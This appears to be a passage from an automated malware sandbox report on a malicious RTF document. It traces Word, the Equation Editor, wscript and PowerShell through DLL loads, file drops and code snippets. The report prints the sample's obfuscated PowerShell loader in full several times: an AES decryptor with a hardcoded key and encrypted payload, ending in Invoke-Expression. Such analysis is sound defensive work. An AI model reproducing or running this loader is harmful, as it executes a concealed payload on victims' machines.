dat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: e2VMPAayU1.LNK.0.drLNK file: ..\..\..\..\..\Desktop\e2VMPAayU1.rtf
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: :e.pdbSIL\S source: powershell.exe, 00000006.00000002.454426075.000000000511A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: >:\Windows\System.Management.Automation.pdbpdbion.pdbv source: powershell.exe, 00000006.00000002.453353036.00000000005B3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 6.Core.pdbpeU source: powershell.exe, 00000006.00000002.454426075.000000000511A000.00000004.00000020.00020000.00000000.sdmp
    Source: ~WRF{9681AC94-218C-447B-8B38-4F8B3535CB8F}.tmp.0.drInitial sample: OLE indicators vbamacros = False

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A7C2B push ecx; ret 2_2_002A7C2F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A7C24 push ecx; ret 2_2_002A7C27
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A486C push eax; ret 2_2_002A486F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C264 pushad ; retn 0029h2_2_0029C289
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A6A7A push ecx; ret 2_2_002A6A7B
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A4E70 push ecx; ret 2_2_002A4E8B
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00298F57 push eax; retf 2_2_00298F61
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002901F4 push eax; retf 2_2_002901F5
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A55C8 push ecx; ret 2_2_002A55DB
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A6AC0 push ecx; ret 2_2_002A6AC3
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C2DC pushad ; retn 0029h2_2_0029C2DD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A55DF push ecx; ret 2_2_002A55E3

    Persistence and Installation Behavior

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
